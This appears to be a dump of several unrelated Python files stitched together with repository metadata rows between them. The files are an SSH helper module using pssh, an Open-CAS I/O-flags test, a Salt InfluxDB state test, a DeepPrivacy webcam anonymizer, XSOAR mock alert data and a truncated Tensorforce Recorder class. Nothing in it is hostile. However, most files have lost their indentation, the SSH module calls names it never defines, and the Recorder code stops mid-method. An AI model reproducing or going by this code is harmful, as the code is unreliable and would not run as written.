from typing import Optional, Dict, Tuple, Generator, List
from paramiko.rsakey import RSAKey
from pathlib import PosixPath
import pssh
import logging
log = logging.getLogger(__name__)
__author__ = '@micmarty, @roscisz'
"""
This module provides a universal and stateless API for SSH-related tasks.
Author's note:
It has similar functionality to `SSHConnectionManager` on purpose -
the goal is to gradually replace chunks of code where it's currently used
without breaking compatibility everywhere.
(SSHConnectionManager has unnecessary boilerplate and stateful behaviour).
"""
# Typing aliases
HostConfig = Dict[str, str]
HostsConfig = Dict[str, HostConfig]
ProxyConfig = Dict[str, str]
Hostname = str
Username = str
CommandResult = Dict[Hostname, pssh.output.HostOutput]
def build_dedicated_config_for(host: Hostname, user: Username) -> Tuple[HostsConfig, Optional[ProxyConfig]]:
"""Takes off the responsibility for building correct HostsConfig manually.
This function is supposed to provide high-level interface for providing
valid `config` and `pconfig` parameter to `get_client()` function.
"""
assert host and user, 'Arguments must not be None!'
assert host in SSH.AVAILABLE_NODES
hosts_config = {
host: {
'user': user,
'pkey': SSH.KEY_FILE,
'port': SSH.AVAILABLE_NODES[host]['port']
}
}
# Read config extracted from hosts_config.ini (proxy is common for all hosts)
pconfig = SSH.PROXY
return hosts_config, pconfig
@memoize
def get_client(config: HostsConfig, pconfig: Optional[ProxyConfig] = None, **kwargs) -> ParallelSSHClient:
"""Builds and returns an ssh client object for given configuration.
Client is fetched directly from cache if identical arguments were used recently.
"""
if pconfig is None:
pconfig = {}
return ParallelSSHClient(
hosts=config.keys(),
host_config=config,
pkey=SSH.KEY_FILE,
proxy_host=pconfig.get('proxy_host'),
proxy_user=pconfig.get('proxy_user'),
proxy_port=pconfig.get('proxy_port'),
num_retries=0,
**kwargs)
def run_command(client: ParallelSSHClient, command: str) -> CommandResult:
"""Executes identical command on all hosts attached to client.
Will wait until all hosts complete the command execution or timeout is reached.
Re-raises pssh exceptions.
# TODO Handle more specific exceptions
"""
# stop_on_errors -> allows others hosts to execute when one crashes, combine exceptions
# output is like: (hostname, host_output)
try:
result = client.run_command(command, stop_on_errors=False)
client.join(result)
except pssh.exceptions.Timeout:
log.warning('Command `{}` reached time limit'.format(command))
raise
except pssh.exceptions.ProxyError as e:
log.error('Could not connect to proxy server, reason: {}'.format(e))
raise
except Exception as e:
log.critical(e)
raise # FIXME Find out what throws this exception
else:
log.debug('Command `{}` finished'.format(command))
return result
def get_stdout(host: Hostname, output: pssh.output.HostOutput) -> Optional[str]:
"""Unwraps stdout generator for given hostname.
Re-raises exceptions that occured during command execution.
Returns a single, usually multi-line string or None
# TODO Handle more exceptions
"""
try:
host_result = output[host]
if host_result.exception:
raise host_result.exception
return '\n'.join(list(host_result.stdout))
except KeyError:
log.error('Could not unwrap HostOutput object for {}'.format(host))
raise
    except TypeError:
log.warning('Could not extract stdout for {}: {}'.format(host, output))
return None
except AuthenticationException:
log.warning('Could not authenticate SSH connection for {}: {}'.format(host, output))
return None
except Exception as e:
log.critical(e)
# Base for all pssh exceptions: https://github.com/ParallelSSH/parallel-ssh/blob/master/pssh/exceptions.py
# client.reset_output_generators(output)
raise
def succeeded(host: Hostname, output: pssh.output.HostOutput) -> bool:
"""Checks whether command's output was executed without any exception and exit code was 0."""
return (output.exception is None) and (output.exit_code == 0)
def generate_cert(path, replace=False):
path.touch(mode=0o600, exist_ok=replace)
key = RSAKey.generate(2048)
key.write_private_key_file(str(path))
return key
def init_ssh_key(path: PosixPath):
if path.exists():
key = RSAKey.from_private_key_file(str(path))
log.info('[⚙] Using existing SSH key in {}'.format(path))
else:
key = generate_cert(path)
log.info('[⚙] Generated SSH key in {}'.format(path))
return key
def node_tty_sessions(connection) -> List[Dict]:
'''Executes shell command in order to fetch all active terminal sessions'''
command = 'who'
output = connection.run_command(command)
# FIXME Assumes that only one node is in connection
for _, host_out in output.items():
result = _parse_who_output(host_out.stdout)
return result
def _parse_who_output(stdout: Generator) -> List[Dict]:
    '''
    Transforms the command output into a list of dictionaries.
    Assumes the command was: 'who | grep <username>'
    '''
stdout_lines = list(stdout) # type: List[str]
# Empty stdout
    if not stdout_lines:
return None
def as_dict(line):
columns = line.split()
return {
# I wanted it to be more explicit and flexible (even if it could be done better)
'USER': columns[0],
'TTY': columns[1]
}
return [as_dict(line) for line in stdout_lines]
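# Hedged usage sketch (not part of this module; the hostname and user are
# illustrative assumptions, and the host must be listed in SSH.AVAILABLE_NODES
# for build_dedicated_config_for() to pass its assertions):
#   config, pconfig = build_dedicated_config_for('node1', 'alice')
#   client = get_client(config, pconfig)
#   result = run_command(client, 'who')
#   print(get_stdout('node1', result))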
|
35bfd207843b0be8a6e55291a3ded30007000e43
|
4b15f318ba3332ee946cb0b2838c93e7935b9b89
|
/tests/functional/tests/engine/test_io_flags.py
|
5fe1b3040cbca350f81dac8bb77d203744350b09
|
[
"BSD-3-Clause"
] |
permissive
|
Open-CAS/ocf
|
c4f8a5c9c1b254a905fda75be2c19bd7c8ebd450
|
016d7a8ee2822d672c308264e79bae4081e7930e
|
refs/heads/master
| 2023-05-28T08:40:51.328181
| 2023-05-11T08:11:57
| 2023-05-11T08:11:57
| 152,160,836
| 168
| 94
|
BSD-3-Clause
| 2023-09-14T08:01:50
| 2018-10-08T23:46:10
|
C
|
UTF-8
|
Python
| false
| false
| 3,521
|
py
|
test_io_flags.py
|
#
# Copyright(c) 2020-2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
from ctypes import c_int, memmove, cast, c_void_p
from enum import IntEnum
from itertools import product
import random
import pytest
from pyocf.types.cache import Cache, CacheMode
from pyocf.types.core import Core
from pyocf.types.volume import RamVolume
from pyocf.types.volume_core import CoreVolume
from pyocf.types.data import Data
from pyocf.types.io import IoDir
from pyocf.utils import Size
from pyocf.types.shared import OcfCompletion
def __io(io, queue, address, size, data, direction):
io.set_data(data, 0)
completion = OcfCompletion([("err", c_int)])
io.callback = completion.callback
io.submit()
completion.wait()
return int(completion.results["err"])
def io_to_exp_obj(vol, address, size, data, offset, direction, flags):
queue = vol.parent.get_default_queue()
vol.open()
io = vol.new_io(queue, address, size, direction, 0, flags)
if direction == IoDir.READ:
_data = Data.from_bytes(bytes(size))
else:
_data = Data.from_bytes(data, offset, size)
ret = __io(io, queue, address, size, _data, direction)
if not ret and direction == IoDir.READ:
memmove(cast(data, c_void_p).value + offset, _data.handle, size)
vol.close()
return ret
class FlagsValVolume(RamVolume):
def __init__(self, size, flags):
self.flags = flags
self.check = False
self.fail = False
super().__init__(size)
def set_check(self, check):
self.check = check
def submit_io(self, io):
if self.check:
flags = io.contents._flags
if flags != self.flags:
self.fail = True
super().submit_io(io)
@pytest.mark.parametrize("cache_mode", CacheMode)
def test_io_flags(pyocf_ctx, cache_mode):
"""
Verify that I/O flags provided at the top volume interface
are propagated down to bottom volumes for all associated
I/Os (including metadata writes to cache volume).
"""
flags = 0x239482
block_size = 4096
data = bytes(block_size)
pyocf_ctx.register_volume_type(FlagsValVolume)
cache_device = FlagsValVolume(Size.from_MiB(50), flags)
core_device = FlagsValVolume(Size.from_MiB(50), flags)
cache = Cache.start_on_device(cache_device, cache_mode=cache_mode)
core = Core.using_device(core_device)
cache.add_core(core)
vol = CoreVolume(core)
cache_device.set_check(True)
core_device.set_check(True)
# write miss
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
# read miss
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "dirty" read hit
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "clean" read hit
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "dirty" write hit
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
# "clean" write hit
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
|
05f72ea15b6d788ee370ea8aea6e39b62d4063b6
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/pytests/unit/states/test_influxdb08_database.py
|
d5685de213120132f386a64ffe4fb38dcaf7988a
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 3,027
|
py
|
test_influxdb08_database.py
|
"""
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
"""
import pytest
import salt.states.influxdb08_database as influxdb08_database
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {influxdb08_database: {}}
def test_present():
"""
Test to ensure that the named database is present.
"""
name = "salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(side_effect=[False, False, False, True])
mock_t = MagicMock(side_effect=[True, False])
with patch.dict(
influxdb08_database.__salt__,
{"influxdb08.db_exists": mock, "influxdb08.db_create": mock_t},
):
with patch.dict(influxdb08_database.__opts__, {"test": True}):
comt = "Database {} is absent and needs to be created".format(name)
ret.update({"comment": comt})
assert influxdb08_database.present(name) == ret
with patch.dict(influxdb08_database.__opts__, {"test": False}):
comt = "Database {} has been created".format(name)
ret.update(
{"comment": comt, "result": True, "changes": {"salt": "Present"}}
)
assert influxdb08_database.present(name) == ret
comt = "Failed to create database {}".format(name)
ret.update({"comment": comt, "result": False, "changes": {}})
assert influxdb08_database.present(name) == ret
comt = "Database {} is already present, so cannot be created".format(name)
ret.update({"comment": comt, "result": True})
assert influxdb08_database.present(name) == ret
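# Note on the mock wiring above: each db_exists call consumes one
# side_effect value, so the four present() calls observe False, False,
# False, True in order, while db_create returns True then False.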
def test_absent():
"""
Test to ensure that the named database is absent.
"""
name = "salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(side_effect=[True, True, True, False])
mock_t = MagicMock(side_effect=[True, False])
with patch.dict(
influxdb08_database.__salt__,
{"influxdb08.db_exists": mock, "influxdb08.db_remove": mock_t},
):
with patch.dict(influxdb08_database.__opts__, {"test": True}):
comt = "Database {} is present and needs to be removed".format(name)
ret.update({"comment": comt})
assert influxdb08_database.absent(name) == ret
with patch.dict(influxdb08_database.__opts__, {"test": False}):
comt = "Database {} has been removed".format(name)
ret.update({"comment": comt, "result": True, "changes": {"salt": "Absent"}})
assert influxdb08_database.absent(name) == ret
comt = "Failed to remove database {}".format(name)
ret.update({"comment": comt, "result": False, "changes": {}})
assert influxdb08_database.absent(name) == ret
comt = "Database {} is not present, so it cannot be removed".format(name)
ret.update({"comment": comt, "result": True})
assert influxdb08_database.absent(name) == ret
|
e9b7caef9c51abd6afff62a998413f2976f899ac
|
6b551bec528a1d6544201d3c6d86835e885343b5
|
/webcam.py
|
2b054228809803eeda08af1bb588d09de5df9771
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
hukkelas/DeepPrivacy
|
9471c8e9389828aa09330905081205b061161d81
|
5ee3f1b0608f03ac54d5694b6421f6132cb63f0e
|
refs/heads/master
| 2023-08-16T00:41:02.366235
| 2023-03-28T06:23:34
| 2023-03-28T06:23:34
| 206,106,232
| 1,288
| 194
|
MIT
| 2021-08-18T08:21:33
| 2019-09-03T15:08:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,732
|
py
|
webcam.py
|
import cv2
import time
import numpy as np
import torch
from deep_privacy import cli
from deep_privacy.visualization import utils as vis_utils
from deep_privacy.utils import BufferlessVideoCapture
from deep_privacy.build import build_anonymizer
import os
# Configs
torch.backends.cudnn.benchmark = False
parser = cli.get_parser()
parser.add_argument("--debug", default=False, action="store_true")
parser.add_argument("-f", "--file", default=None)
args = parser.parse_args()
anonymizer, cfg = build_anonymizer(
args.model, opts=args.opts, config_path=args.config_path,
return_cfg=True)
if args.debug:
anonymizer.save_debug = True
width = 1280
height = 720
if args.file is not None:
assert os.path.isfile(args.file)
cap = cv2.VideoCapture(args.file)
else:
cap = BufferlessVideoCapture(0)
frames = 0
WARMUP = True
t = time.time()
while True:
# Capture frame-by-frame
ret, frame = cap.read()
frame = cv2.resize(frame, (width, height))
frame = frame[:, :, ::-1]
frame = anonymizer.detect_and_anonymize_images([frame])[0]
frame = frame[:, :, ::-1]
# Display the resulting frame
if WARMUP and frames > 30:
WARMUP = False
t = time.time()
frames = 0
frames += 1
delta = time.time() - t
    fps = "?"
    if delta > 1e-6:
        fps = f"{frames / delta:.1f}"
    print(f"FPS: {fps}", end="\r")
if args.debug:
debug_im = cv2.imread(".debug/inference/im0_face0.png")
debug_im = vis_utils.pad_im_as(debug_im, frame)
frame = np.concatenate((frame, debug_im))
    cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
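# Hedged sketch (the real deep_privacy.utils.BufferlessVideoCapture may
# differ): a bufferless capture keeps only the most recent camera frame in a
# one-slot queue, so anonymization always works on the live frame instead of
# lagging behind a growing buffer.
import threading
import queue
class _BufferlessCaptureSketch:
    def __init__(self, index=0):
        self._cap = cv2.VideoCapture(index)
        self._q = queue.Queue(maxsize=1)
        threading.Thread(target=self._reader, daemon=True).start()
    def _reader(self):
        while True:
            ok, frame = self._cap.read()
            if not ok:
                break
            if self._q.full():
                self._q.get_nowait()  # drop the stale frame
            self._q.put(frame)
    def read(self):
        # mimic cv2.VideoCapture.read(): returns (ret, frame)
        return True, self._q.get()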
|
d72448376c052f0258db792fa11c682b7776216e
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/ZeroTrustAnalyticsPlatform/Integrations/ZeroTrustAnalyticsPlatform/test_data/api_data.py
|
5e9944225ee0b0d1a56096ab8c903bf8bd59387d
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
api_data.py
|
def alert_data():
return [
{
"datetime_created": "2021-05-11T20:11:31Z",
"datetime_closed": None,
"datetime_firstevent": "2021-05-11T20:11:30Z",
"datetime_events_added": "2021-05-11T20:11:31Z",
"datetime_org_assigned": "2021-05-11T20:11:31Z",
"id": 1,
"status": "assigned",
"description": "Test Alert 1",
"url": "http://some_mock_url/#/incidents/1",
},
{
"datetime_created": "2021-05-11T20:09:50Z",
"datetime_closed": None,
"datetime_firstevent": "2021-05-11T20:09:48Z",
"datetime_events_added": "2021-05-11T20:09:50Z",
"datetime_org_assigned": "2021-05-11T20:09:50Z",
"id": 2,
"status": "assigned",
"description": "Test Alert 2",
"url": "http://some_mock_url/#/incidents/2",
},
]
def escalation_path_data():
return [
{
"time": "2021-05-11T20:11:31Z",
"group": "Default (dummy_org)",
"group_id": "1",
"type": "Group",
},
]
def event_data():
return [
{
"ata_event_count": 1,
"datetime_created": "2021-05-11T20:11:30Z",
"fields": [
{"key": "auto_run", "label": "Auto Run", "value": "False", "order": 0},
{
"key": "event_name",
"label": "Event Name",
"value": "threat_quarantined",
"order": 1,
},
{
"key": "event_timestamp",
"label": "Event Timestamp",
"value": "2021-05-11T20:11:30.728667",
"order": 2,
},
],
"trigger": True,
},
]
def comment_data():
return [
{
"comment": "Test comment",
"datetime_created": "2021-05-10T19:36:48Z",
"id": 1,
"user": user_data(),
},
{
"comment": "Closing alert due to duplicate.",
"datetime_created": "2021-05-10T19:50:18Z",
"id": 2,
"user": user_data(),
},
]
def organization_data():
return [
{
"id": 2,
"psa_id": "dummy_id",
"name": "dummy_org",
"monitoring_organization": {
"id": 1,
"psa_id": "csmssp",
"name": "Critical Start MDR",
},
},
{
"id": 3,
"psa_id": "child_org_id",
"name": "child_org",
"monitoring_organization": {
"id": 1,
"psa_id": "dummy_id",
"name": "Critical Start MDR",
},
},
]
def group_data():
return [
{
"id": 1,
"name": "Different Group",
"organization": {"id": 1, "name": "dummy_org"},
},
{
"id": 2,
"name": "Default",
"organization": {"id": 1, "name": "dummy_org"},
},
]
def user_data():
return {
"id": 1,
"name": "Active User",
"email": "test@test",
"organization": {"id": 1, "name": "dummy_org", "psa_id": "dummy_id"},
}
|
0b759320031ffb7d4ea33623383f3488864125ae
|
64d923ab490341af97c4e7f6d91bf0e6ccefdf4b
|
/tensorforce/agents/recorder.py
|
eb255f8fa9e95467ba57e9d7dfba98a2660617eb
|
[
"Apache-2.0"
] |
permissive
|
tensorforce/tensorforce
|
38d458fedeeaa481adf083397829cea434d020cd
|
1bf4c3abb471062fb66f9fe52852437756fd527b
|
refs/heads/master
| 2023-08-17T17:35:34.578444
| 2023-08-14T20:14:08
| 2023-08-14T20:14:08
| 85,491,050
| 1,312
| 246
|
Apache-2.0
| 2023-08-14T20:14:10
| 2017-03-19T16:24:22
|
Python
|
UTF-8
|
Python
| false
| false
| 24,304
|
py
|
recorder.py
|
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from collections import OrderedDict
import numpy as np
from tensorforce import TensorforceError, util
from tensorforce.core import ArrayDict, ListDict, TensorSpec, TensorsSpec
class Recorder(object):
"""
Recorder wrapper (specification key: `recorder`).
Args:
fn_act (callable[states -> actions]): Act-function mapping states to actions which is
supposed to be recorded.
"""
def __init__(
self, fn_act, states, actions, max_episode_timesteps=None, parallel_interactions=1,
recorder=None
):
self.is_initialized = False
# fn_act=None means Agent
if fn_act is None:
from tensorforce import Agent
assert isinstance(self, Agent)
self._is_agent = True
else:
self._is_agent = False
self.fn_act = fn_act
# States/actions, plus single state/action flag
if 'type' in states or 'shape' in states:
self.states_spec = TensorsSpec(singleton=states)
else:
self.states_spec = TensorsSpec(states)
if 'type' in actions or 'shape' in actions:
self.actions_spec = TensorsSpec(singleton=actions)
else:
self.actions_spec = TensorsSpec(actions)
# Max episode timesteps
if max_episode_timesteps is None:
self.max_episode_timesteps = None
else:
self.max_episode_timesteps = int(max_episode_timesteps)
# Parallel interactions
if isinstance(parallel_interactions, int):
if parallel_interactions <= 0:
raise TensorforceError.value(
name='Agent', argument='parallel_interactions', value=parallel_interactions,
hint='<= 0'
)
self.parallel_interactions = parallel_interactions
else:
raise TensorforceError.type(
name='Agent', argument='parallel_interactions', dtype=type(parallel_interactions)
)
# Other specifications
self.internals_spec = TensorsSpec()
self.terminal_spec = TensorSpec(type=int, shape=(), num_values=3)
self.reward_spec = TensorSpec(type=float, shape=())
self.parallel_spec = TensorSpec(type=int, shape=(), num_values=self.parallel_interactions)
# Recorder
if isinstance(recorder, str):
recorder = dict(directory=recorder)
if recorder is None:
pass
elif not all(key in ('directory', 'frequency', 'max-traces', 'start') for key in recorder):
raise TensorforceError.value(
name='Agent', argument='recorder values', value=list(recorder),
hint='not from {directory,frequency,max-traces,start}'
)
self.recorder = recorder if recorder is None else dict(recorder)
def initialize(self):
# Check whether already initialized
if self.is_initialized:
raise TensorforceError(
message="Agent is already initialized, possibly as part of Agent.create()."
)
self.is_initialized = True
# Act-observe timestep check
self.timestep_counter = np.zeros(
shape=(self.parallel_interactions,), dtype=util.np_dtype(dtype='int')
)
self.timestep_completed = np.ones(
shape=(self.parallel_interactions,), dtype=util.np_dtype(dtype='bool')
)
# Recorder buffers if required
if self.recorder is not None:
self.num_episodes = 0
self.buffers = ListDict()
self.buffers['terminal'] = [list() for _ in range(self.parallel_interactions)]
self.buffers['reward'] = [list() for _ in range(self.parallel_interactions)]
def function(spec):
return [list() for _ in range(self.parallel_interactions)]
self.buffers['states'] = self.states_spec.fmap(function=function, cls=ListDict)
self.buffers['actions'] = self.actions_spec.fmap(function=function, cls=ListDict)
function = (lambda x: list())
self.recorded = ListDict()
self.recorded['states'] = self.states_spec.fmap(function=function, cls=ListDict)
self.recorded['actions'] = self.actions_spec.fmap(function=function, cls=ListDict)
self.recorded['terminal'] = list()
self.recorded['reward'] = list()
def close(self):
pass
def reset(self):
# Reset timestep check
self.timestep_counter[:] = 0
self.timestep_completed[:] = True
# Reset buffers
if self.recorder is not None:
for buffer in self.buffers.values():
for x in buffer:
x.clear()
if self.recorder is not None:
for x in self.recorded.values():
x.clear()
def initial_internals(self):
return OrderedDict()
def act(
self, states, internals=None, parallel=0, independent=False, deterministic=True, **kwargs
):
# Independent and internals
is_internals_none = (internals is None)
if independent:
if parallel != 0:
raise TensorforceError.invalid(
name='Agent.act', argument='parallel', condition='independent is true'
)
if is_internals_none and len(self.internals_spec) > 0:
raise TensorforceError.required(
name='Agent.act', argument='internals', condition='independent is true'
)
else:
if not is_internals_none:
raise TensorforceError.invalid(
name='Agent.act', argument='internals', condition='independent is false'
)
# Process states input and infer batching structure
states, batched, num_parallel, is_iter_of_dicts = self._process_states_input(
states=states, function_name='Agent.act'
)
if independent:
# Independent mode: handle internals argument
if is_internals_none:
# Default input internals=None
pass
elif is_iter_of_dicts or isinstance(internals, (tuple, list)):
# Input structure iter[dict[internal]]
if not isinstance(internals, (tuple, list)):
raise TensorforceError.type(
name='Agent.act', argument='internals', dtype=type(internals),
hint='is not tuple/list'
)
internals = [ArrayDict(internal) for internal in internals]
internals = internals[0].fmap(
function=(lambda *xs: np.stack(xs, axis=0)), zip_values=internals[1:]
)
else:
# Input structure dict[iter[internal]]
if not isinstance(internals, dict):
raise TensorforceError.type(
name='Agent.act', argument='internals', dtype=type(internals),
hint='is not dict'
)
internals = ArrayDict(internals)
if not independent or not is_internals_none:
# Expand inputs if not batched
if not batched:
internals = internals.fmap(function=(lambda x: np.expand_dims(x, axis=0)))
# Check number of inputs
for name, internal in internals.items():
if internal.shape[0] != num_parallel:
raise TensorforceError.value(
name='Agent.act', argument='len(internals[{}])'.format(name),
value=internal.shape[0], hint='!= len(states)'
)
else:
# Non-independent mode: handle parallel input
if batched:
# Batched input
parallel = np.asarray(parallel)
elif parallel == 0:
# Default input parallel=0
if batched:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray([parallel])
else:
# Expand input if not batched
parallel = np.asarray([parallel])
# Check number of inputs
if parallel.shape[0] != num_parallel:
raise TensorforceError.value(
name='Agent.act', argument='len(parallel)', value=len(parallel),
hint='!= len(states)'
)
# If not independent, check whether previous timesteps were completed
if not independent:
if not self.timestep_completed[parallel].all():
raise TensorforceError(
message="Calling agent.act must be preceded by agent.observe for training, or "
"agent.act argument 'independent' must be passed as True."
)
self.timestep_completed[parallel] = False
# Buffer inputs for recording
if self.recorder is not None and not independent and \
self.num_episodes >= self.recorder.get('start', 0):
for n in range(num_parallel):
for name in self.states_spec:
self.buffers['states'][name][parallel[n]].append(states[name][n])
# fn_act()
if self._is_agent:
actions, internals = self.fn_act(
states=states, internals=internals, parallel=parallel, independent=independent,
deterministic=deterministic, is_internals_none=is_internals_none,
num_parallel=num_parallel
)
else:
if batched:
assert False
else:
states = states.fmap(function=(lambda x: x[0].item() if x.shape == (1,) else x[0]))
actions = self.fn_act(states.to_kwargs())
if self.actions_spec.is_singleton():
actions = ArrayDict(singleton=np.asarray([actions]))
else:
actions = ArrayDict(actions)
actions = actions.fmap(function=(lambda x: np.asarray([x])))
# Buffer outputs for recording
if self.recorder is not None and not independent and \
self.num_episodes >= self.recorder.get('start', 0):
for n in range(num_parallel):
for name in self.actions_spec:
self.buffers['actions'][name][parallel[n]].append(actions[name][n])
# Unbatch actions
if batched:
# If inputs were batched, turn dict of lists into list of dicts
function = (lambda x: x.item() if x.shape == () else x)
# TODO: recursive
if self.actions_spec.is_singleton():
actions = actions.singleton()
if is_iter_of_dicts:
actions = [function(actions[n]) for n in range(num_parallel)]
else:
if is_iter_of_dicts:
actions = [
OrderedDict(((name, function(x[n])) for name, x in actions.items()))
for n in range(num_parallel)
]
else:
actions = OrderedDict(actions.items())
if independent and not is_internals_none:
if is_iter_of_dicts:
# TODO: recursive
internals = [
OrderedDict(((name, function(x[n])) for name, x in internals.items()))
for n in range(num_parallel)
]
else:
internals = OrderedDict(internals.items())
else:
# If inputs were not batched, unbatch outputs
function = (lambda x: x.item() if x.shape == (1,) else x[0])
if self.actions_spec.is_singleton():
actions = function(actions.singleton())
else:
actions = actions.fmap(function=function, cls=OrderedDict)
if independent and not is_internals_none:
internals = internals.fmap(function=function, cls=OrderedDict)
if independent and not is_internals_none:
return actions, internals
else:
return actions
def observe(self, reward=0.0, terminal=False, parallel=0):
# Check whether inputs are batched
if util.is_iterable(x=reward) or (isinstance(reward, np.ndarray) and reward.ndim > 0):
reward = np.asarray(reward)
num_parallel = reward.shape[0]
if not isinstance(terminal, np.ndarray) and terminal is False:
terminal = np.asarray([0 for _ in range(num_parallel)])
else:
terminal = np.asarray(terminal)
if not isinstance(parallel, np.ndarray) and parallel == 0:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray(parallel)
elif util.is_iterable(x=terminal) or \
(isinstance(terminal, np.ndarray) and terminal.ndim > 0):
terminal = np.asarray(terminal, dtype=util.np_dtype(dtype='int'))
num_parallel = terminal.shape[0]
if not isinstance(reward, np.ndarray) and reward == 0.0:
reward = np.asarray([0.0 for _ in range(num_parallel)])
else:
reward = np.asarray(reward)
if not isinstance(parallel, np.ndarray) and parallel == 0:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray(parallel)
elif util.is_iterable(x=parallel) or \
(isinstance(parallel, np.ndarray) and parallel.ndim > 0):
parallel = np.asarray(parallel)
num_parallel = parallel.shape[0]
if not isinstance(reward, np.ndarray) and reward == 0.0:
reward = np.asarray([0.0 for _ in range(num_parallel)])
else:
reward = np.asarray(reward)
if not isinstance(terminal, np.ndarray) and terminal is False:
terminal = np.asarray([0 for _ in range(num_parallel)])
else:
terminal = np.asarray(terminal)
else:
reward = np.asarray([float(reward)])
terminal = np.asarray([int(terminal)])
parallel = np.asarray([int(parallel)])
num_parallel = 1
# Check whether shapes/lengths are consistent
if parallel.shape[0] == 0:
raise TensorforceError.value(
name='Agent.observe', argument='len(parallel)', value=parallel.shape[0], hint='= 0'
)
if reward.shape != parallel.shape:
raise TensorforceError.value(
name='Agent.observe', argument='len(reward)', value=reward.shape,
hint='!= parallel length'
)
if terminal.shape != parallel.shape:
raise TensorforceError.value(
name='Agent.observe', argument='len(terminal)', value=terminal.shape,
hint='!= parallel length'
)
# Convert terminal to int if necessary
if terminal.dtype is util.np_dtype(dtype='bool'):
zeros = np.zeros_like(terminal, dtype=util.np_dtype(dtype='int'))
ones = np.ones_like(terminal, dtype=util.np_dtype(dtype='int'))
terminal = np.where(terminal, ones, zeros)
# Check whether current timesteps are not completed
if self.timestep_completed[parallel].any():
raise TensorforceError(message="Calling agent.observe must be preceded by agent.act.")
self.timestep_completed[parallel] = True
# Check whether episode is too long
self.timestep_counter[parallel] += 1
if self.max_episode_timesteps is not None and np.logical_and(
terminal == 0, self.timestep_counter[parallel] > self.max_episode_timesteps
).any():
raise TensorforceError(message="Episode longer than max_episode_timesteps.")
self.timestep_counter[parallel] = np.where(terminal > 0, 0, self.timestep_counter[parallel])
if self.recorder is None:
pass
elif self.num_episodes < self.recorder.get('start', 0):
# Increment num_episodes
for t in terminal.tolist():
if t > 0:
self.num_episodes += 1
else:
# Store values per parallel interaction
for p, t, r in zip(parallel.tolist(), terminal.tolist(), reward.tolist()):
# Buffer inputs
self.buffers['terminal'][p].append(t)
self.buffers['reward'][p].append(r)
# Continue if not terminal
if t == 0:
continue
self.num_episodes += 1
# Buffered terminal/reward inputs
for name in self.states_spec:
self.recorded['states'][name].append(
np.stack(self.buffers['states'][name][p], axis=0)
)
self.buffers['states'][name][p].clear()
for name, spec in self.actions_spec.items():
self.recorded['actions'][name].append(
np.stack(self.buffers['actions'][name][p], axis=0)
)
self.buffers['actions'][name][p].clear()
self.recorded['terminal'].append(
np.array(self.buffers['terminal'][p], dtype=self.terminal_spec.np_type())
)
self.buffers['terminal'][p].clear()
self.recorded['reward'].append(
np.array(self.buffers['reward'][p], dtype=self.reward_spec.np_type())
)
self.buffers['reward'][p].clear()
# Check whether recording step
if (self.num_episodes - self.recorder.get('start', 0)) \
% self.recorder.get('frequency', 1) != 0:
continue
# Manage recorder directory
directory = self.recorder['directory']
if os.path.isdir(directory):
files = sorted(
f for f in os.listdir(directory)
if os.path.isfile(os.path.join(directory, f))
and os.path.splitext(f)[1] == '.npz'
)
else:
os.makedirs(directory)
files = list()
max_traces = self.recorder.get('max-traces')
if max_traces is not None and len(files) > max_traces - 1:
for filename in files[:-max_traces + 1]:
filename = os.path.join(directory, filename)
os.remove(filename)
# Write recording file
filename = os.path.join(directory, 'trace-{:09d}.npz'.format(self.num_episodes - 1))
# time.strftime('%Y%m%d-%H%M%S')
kwargs = self.recorded.fmap(function=np.concatenate, cls=ArrayDict).items()
